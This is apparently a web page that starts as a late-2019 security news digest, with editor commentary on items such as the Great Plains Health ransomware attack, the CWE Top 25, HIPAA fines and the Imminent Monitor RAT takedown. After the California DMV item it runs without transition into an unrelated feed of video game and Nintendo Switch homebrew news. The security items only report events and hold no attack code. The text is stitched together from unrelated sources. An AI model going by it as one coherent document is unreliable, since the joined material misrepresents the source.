Great Plains Health Recovering From Ransomware. Great Plains Health (GPHealth) medical center is recovering from a ransomware attack. The attack occurred on Monday, November 25. The next day, GPHealth canceled a large number of non-emergency appointments and procedures. GPHealth is based in North Platte, Nebraska.
Note: Speaking of HHS notifications, in the Sentara Hospitals story below, the regulators want you to tell them all about your ransomware problems, even if you think it’s just an integrity issue and not confidentiality. HHS put out specific ransomware guidance a few years ago. Yes, it’s a breach: www.hhs.gov: FACT SHEET: Ransomware and HIPAA
Read more in:
- Ransomware Locks Medical Records at Great Plains Health
- Ransomware Attack Forces Great Plains Health to EHR Downtime
Common Weakness Enumeration List Updated. The MITRE Corp. has updated the Common Weakness Enumeration (CWE) list. According to MITRE, the CWE Top 25 is “a demonstrative list of the most widespread and critical weaknesses that can lead to serious vulnerabilities in software.” Topping the revised list is “Improper Restriction of Operations within the Bounds of a Memory Buffer.” Cross-site scripting errors are listed second. SQL injection vulnerabilities, which topped the previous version of the list, are now in sixth place. MITRE Corp. operates the Department of Homeland Security’s (DHS’s) Systems Engineering and Development Institute.
Note: Sadly, we can enumerate our errors but not fix them. Part of the problem here is the von Neumann Architecture, part of the languages we use, part that the programmer does not, or cannot, know the environment in which his program will run, and only a small part that it is a hard problem. However, a good craftsman does not blame his tools. If we insist upon using flawed tools for hard problems, we must train to compensate for them. Our tolerance for shoddy continues to be an embarrassment.
Read more in:
- 2019 CWE Top 25 Most Dangerous Software Errors
- Snapshot: Top 25 Most Dangerous Software Errors
- SQL Injection Errors No Longer the Top Software Security Issue
- Top 25 Most Dangerous Vulnerabilities Refreshed After 8 Years
Google Warns Users of Nation-State Email Hacking. In three months earlier this year, Google notified more than 12,000 users that their accounts were being targeted in phishing attacks conducted by government-backed hackers. The majority of alerts were sent to users in South Korea, Pakistan, Vietnam, and the US.
Note: SANS instructor Heather Mahalik did a great talk at the SANS keynote threat panel at the RSA conference on how much information many users expose to cloud-based email providers such as Gmail, and common ways attackers use social media paths to trick users into exposing password reset info. Heather gave great advice to give to executives. You can see a summary with links in the white paper at www.sans.org: SANS Top New Attacks and Threat Report (PDF)
Read more in:
- Google Warns 12,000 People They Were Hit By Government Hackers—Here’s What To Do If You’re A Target
- Google caught a Russian state hacker crew uploading badness to the Play Store
- In just three months, Google sent 12k warnings about government-backed attacks
Sentara Hospitals Fined for Failing to Properly Report Breach to HHS. Virginia-based Sentara Hospitals has agreed to a $2.2 million settlement with the Office for Civil Rights (OCR) at the U.S. Department of Health and Human Services (HHS) over violations of the Health Insurance Portability and Accountability Act (HIPAA). OCR launched its investigation after learning that Sentara had mailed nearly 600 patients’ personal health information to the wrong addresses. Sentara has also agreed to “a corrective action plan.”
Note: The fine works out to about $3,600 per record exposed, a really scary number that will be good ammunition for getting senior management attention. In 2019, HHS has issued 7 fines averaging just under $2M each – the size of the fines is more related to large process deficiencies than to the size of the breach. The average profit margin in healthcare is in the 5% range, meaning that a $2M fine essentially cancels out $40M in revenue! That is a better number to use when trying to justify the spending needed to reach basic security hygiene levels.
Read more in:
- OCR Secures $2.175 Million HIPAA Settlement After Hospitals Failed to Properly Notify HHS of a Breach of Unsecured Protected Health Information
- US Hospitals Fined $2.175M for “Refusal to Properly Report” Data Breach
- Sentara Hospitals’ HIPAA Settlement: Why $2.2 Million?
Piracy Sites Shut Down. Europol, working with law enforcement teams from 18 countries, has shut down more than 30,000 Internet domain names for trafficking in pirated digital content and counterfeit products and pharmaceuticals. Officials have also seized physical property, frozen at least €150,000 (US $165,000) in several bank accounts, and arrested three individuals in connection with the investigation.
Read more in:
- 30,506 Internet Domain Names Shut Down For Intellectual Property Infringement
- Over 30,500 Online Piracy Sites Shut Down in Global Operation
- Europol wipes out 30,000+ piracy sites, three suspects cuffed to walk the legal plank
Imminent Monitor RAT Operation Shut Down. Law enforcement officials from multiple countries cooperated to take down the infrastructure supporting a malware operation known as Imminent Monitor, a remote access Trojan (RAT) that has been sold online since 2013. The investigation was led by the Australian Federal Police and aided by authorities in Belgium, New Zealand, the UK, the US, and other countries.
Note: Well done to all involved in this takedown. A timely reminder that international cooperation is key to tackling the scourge of online crime. It is also a good time to highlight again the No More Ransom website supported by Europol which distributes the known decryption keys for ransomware strains. You can access it for free at www.nomoreransom.org
Read more in:
- The Rat Trap: international cybercrime investigation shuts down insidious malware operation
- International Crackdown On Rat Spyware Which Takes Total Control of Victims’ PCs
- Authorities take down ‘Imminent Monitor’ RAT malware operation
- Authorities Break Up Imminent Monitor Spyware Organization
- Law Enforcement Shuts Down Imminent Monitor Malware, Makes Arrests
- Law enforcement delivers knockout blow to Imminent Monitor RAT network
CISA Wants US Government Agencies to Establish Vulnerability Disclosure Programs. The US Department of Homeland Security’s (DHS’s) Cybersecurity and Infrastructure Security Agency (CISA) has issued a draft binding operational directive (BOD 20-01) that would require civilian agencies to establish vulnerability disclosure programs, as well as a plan for managing security issues that are reported. CISA is accepting comments on the draft document through December 27, 2019.
- Large technology companies in private industry went through this over a decade ago, and the results were overwhelmingly positive. It would be good to see CISA provide a strawman vulnerability disclosure policy as a starting point for all the departments and agencies.
- The guidance on the BOD 20-01 web site includes all the aspects needed as well as timelines; providing a sample policy would help agencies meet the deliverables, as well as avoiding “wrong-rock” iterations. The directive includes additional FISMA reporting requirements associated with the disclosure program starting in FY21. While well-intended, not every agency has the resources or process maturity to meet the tracking, verification, response and reporting requirements.
Read more in:
- Improving Vulnerability Disclosure Together (blog)
- Binding Operational Directive 20-01 | November 27, 2019 (draft) | Develop and Publish a Vulnerability Disclosure Policy
- DHS to Require Federal Agencies to Set Vulnerability Disclosure Policies
- CISA Pushing U.S. Agencies to Adopt Vulnerability Disclosure Policies
- DHS issues draft order to require vulnerability disclosure policies at civilian agencies
Facebook and Twitter Warn of Malicious SDKs. Twitter and Facebook have warned of certain malicious software development kits (SDKs) that could be used to steal users’ personal information. The SDKs in question are maintained by MobiBurn and oneAudience.
Note: These SDKs are being leveraged by data aggregators and have been seen on Android vs iOS. Use caution with granting excess permissions on Android applications.
Read more in:
- Facebook, Twitter ban malicious SDK that removed member info
- Two third-party SDKs allowed secret harvesting of Twitter and Facebook user data
- SDKs Misused to Scrape Twitter, Facebook Account Info
- Keeping your account safe from malicious activity
California DMV Makes Millions Selling Drivers’ Personally Identifiable Information. According to documents obtained through a public records act request, the California Department of Motor Vehicles (DMV) has been making millions of dollars a year selling drivers’ personal information. Customers paying for the information include data brokers, credit reporting agencies, and private investigators. The data include names, addresses, and car registration information, all of which drivers must provide to get a license. The practice of DMVs selling driver data is not unique to California.
Note: No, it is not unique to California but is usually governed by law. Where it is not, it is because the legislature chooses to look the other way.
The headline on 20 December 2019
Warner Bros. UK has released the LEGO® Star Wars: The Skywalker Saga sizzle reel; the game, from TT Games, arrives in 2020.
LEGO Builder’s Journey, available now exclusively on Apple Arcade.
The headline on 19 December 2019
Modus Games and Stormind Games shared a new look at the Ashmann Inn, the ominous home away from home guests will settle into when Remothered: Broken Porcelain releases on PlayStation 4, Nintendo Switch, PC and Xbox One in 2020.
Team17 and Moi Rai Games launched a free update to Monster Sanctuary which includes a community-designed monster and online player-versus-player combat.
The headline on 18 December 2019
Metro VR Studios (MVRS) announces it’s ready to deliver Orion13, which is scheduled for release in Feb. 2020 and will be available for HTC and Oculus headsets.
The headline on 16 December 2019
Team17 has announced a new partnership with Bad Yolk Games to support the development of Main Assembly.
Dispatch Games announced that Japanese Rail Sim: Journey to Kyoto is scheduled to release in spring of 2020 on Nintendo Switch™. It will be available in both digital and packaged form for the North American market.
NX-Activity-Log Version 1.1 Release: Now it can override User Page and view recent play activity. Source: GitHub > NX-Activity-Log
All 153 ImmortalFaith Guides updated to 7.23d patch. Source: Steam > ImmortalFaith
Ghost of Tsushima box art, releasing Summer 2020.
The headline on 13 December 2019
Röki demo available for 48 hours from 6 pm GMT/10 am PT on Steam’s dedicated page.
Angry Birds VR: Isle of Pigs update released today by Resolution Games for Rovio Entertainment’s (ROVIO) feathered friends; players can now, for the first time in any Angry Birds game, design and play their very own levels.
Team17, SMG Studio, and DevM Games have announced that Moving Out will launch in Q2 2020 on Nintendo Switch, PC (Steam), PlayStation 4 and Xbox One. A demo of Moving Out will be available on Steam for a limited 48 hours, from 6 pm GMT today until 6 pm GMT Saturday 14th December; it features four levels of 1-4 player couch co-op madcap mayhem that gives players the chance to experience some of what the full game has in store next year.
The headline on 12 December 2019
Atmosphere 0.10.1 released, bundled with hbl 2.3, and hbmenu 3.2.0. Source: GitHub > Atmosphère 0.10.1
JaffaJam releasing Slam Dunk Santa, utilizing its framework BubbleGum, a development toolset for the Unity platform.
SOEDESCO and Tropical Puppy publish Fantasy Farming: Orange Season, available for Early Access on Steam with a 94% ‘very positive’ rating out of 110 total ratings.
The headline on 11 December 2019
Capcom has unveiled a completely reimagined Resident Evil 3. Resident Evil 3 will be available on PlayStation 4, Xbox One and Steam on April 3, 2020.
MechWarrior 5: Mercenaries from Piranha Games is now available for download on the Epic Games Store ($49.99 standard, $59.99 collectors edition.)
The headline on 10 December 2019
Vertex Pop announced that Super Crush KO is coming to the eShop for Nintendo Switch and Steam on January 16th, 2020.
Gameforge introduces Act 7: The Orcs and the Celestial Spire, the biggest update for NosTale with new maps, monsters, and quests, as well as an enhanced game experience in the fantastic world, enriched with extensive features.
Gunlord X from developer NGDEV will be available digitally for PS4 on December 10th in North America and December 11th in Europe for US$9.99 and €9.99.
Portal Games announces the second expansion for Empires of the North: Roman Banners, to be published in 1Q 2020, which includes two brand new Roman decks and additional island cards. Source: Portal Games announces brand new expansion to Empires of the North: Roman Banners
Checkpoint 3.7.4 released with Atmosphere 0.10.0 compatibility and QoL fixes. Source: GitHub > Checkpoint 3.7.4
Bounty Rune update: bounty gold values are now locked to 5-minute intervals (so a 6-minute bounty isn’t worth more than a 5-minute one). Source: Steam > DOTA 2 UPDATE – DECEMBER 9TH 2019
New BioShock Announced, Being Developed by New Developer Cloud Chamber, but don’t expect the new game soon. Source: IGN > New BioShock Game Announced, Being Developed by New 2K Studio Cloud Chamber
The headline on 9 December 2019
SX OS v2.9.3. Beta updated to support FW 9.1.0 and game titles that use newer encryption, available on the SX OS download page and as an OTA update using the SX OS built-in updater. Source: Team Xecuter > SX OS v2.9.3. Beta Announcement
Atmosphère 0.10.0 released, bundled with hbl 2.2 and hbmenu 3.1.1. Source: GitHub > Atmosphère 0.10.0
The headline on 7 December 2019
Warsaw, Poland | Space Pioneer is now available on Nintendo Switch for 10 USD / 10 EUR.
Skybound Games and Sheffield announced that Gang Beasts is now available on PlayStation 4 and Xbox One at retail locations across North America from the 3rd December and in all other territories from the 6th December for $29.99 / €24.99 / £19.99.
The headline on 5 December 2019
Goat of Duty is going free on Steam for one weekend only, starting today at 6 pm GMT/7 pm CET/1 pm ET/10 am PT and running until the end of Sunday 8th.
Private Division and Squad announced that Kerbal Space Program Enhanced Edition: Breaking Ground Expansion is now available for PlayStation 4 and Xbox One, focused on increasing the objective possibilities once celestial bodies have been reached by adding more interesting scientific endeavors and expanding the toolset.
System Update version 9.1.0 for Switch released on December 4, 2019. General system stability improvements to enhance the user’s experience, including a solution for the following:
- Resolved an issue where the color animation was not displaying correctly when attaching a Joy-Con controller to the Nintendo Switch console.
- The titles’ .*info files are now available (title descriptions were also updated if needed/successful), see the report title-listing.
- Started sysmodule SwIPC-generation task. The output will be available with the above .info files via the report title-listing page, this will take a while to finish for all sysmodules.
- Security flaws fixed.
Sysupdate detected for Switch: https://t.co/S8l98B5ro1
— ylws8bot (@ylws8bot) December 5, 2019
The headline on 3 December 2019
Rebellion has brought three classic titles to Steam for the first time. The trio of golden oldies are Free Running, World War Zero and Gunlok, and all three games are available at a special 15% launch week discount.
Skybound Games and Beamdog announced that the physical and digital enhanced edition of Neverwinter Nights can be purchased at major retailers globally for £39.00/€49.99/$49.99 on the PlayStation 4, Xbox One, and Nintendo Switch.
The headline on 2 December 2019
uLaunch 0.2 released, with Quick Menu, Settings, controller menu applet, and uViewer. Source: GitHub > XorTroll/uLaunch
Reality Clash offers tokenized in-game weapons in the world’s first blockchain-based digital gaming vending machine. Reality Gaming Group has joined forces with Silica neXus to provide arcade gamers with in-game tokenized assets via the world’s first blockchain-based vending machines which will be available across family entertainment centers, arcades and theme parks globally in the US.
Farming Simulator 20 released on Nintendo Switch and for Android and iOS devices, features over 100 faithfully reproduced farming vehicles and tools from a wide range of industry-leading manufacturers.
Weakless is coming to Xbox One on December 13th. Weakless PC release is coming in the first quarter of 2020.
The latest update of Kitty Powers’ Matchmaker is now available in French, Italian, and German. Kitty Powers’ Matchmaker is available on Steam, Xbox One, Playstation 4, Android and Apple devices.
LABS Works announced that Castle in the Darkness 2 is now in development and offers a similar brand of high-speed, action-RPG exploration to the first game.
Good Luck 3, Inc. initiated a crowdfunding campaign through “FUNDINNO” on November 27, 2019; the project received 10,000,000 JPY (USD 100,000) within 3 minutes of going live. The funds will be used towards further growth of existing projects, including Japan’s first blockchain game, Crypt-Oink, and the blockchain content platform RAKUN.
Slitherine LTD in collaboration with Sony Pictures Consumer Products announced “Starship Troopers – Terran Command,” a real-time strategy game based on TriStar Pictures’ iconic 1997 movie to be released for PC in 2020.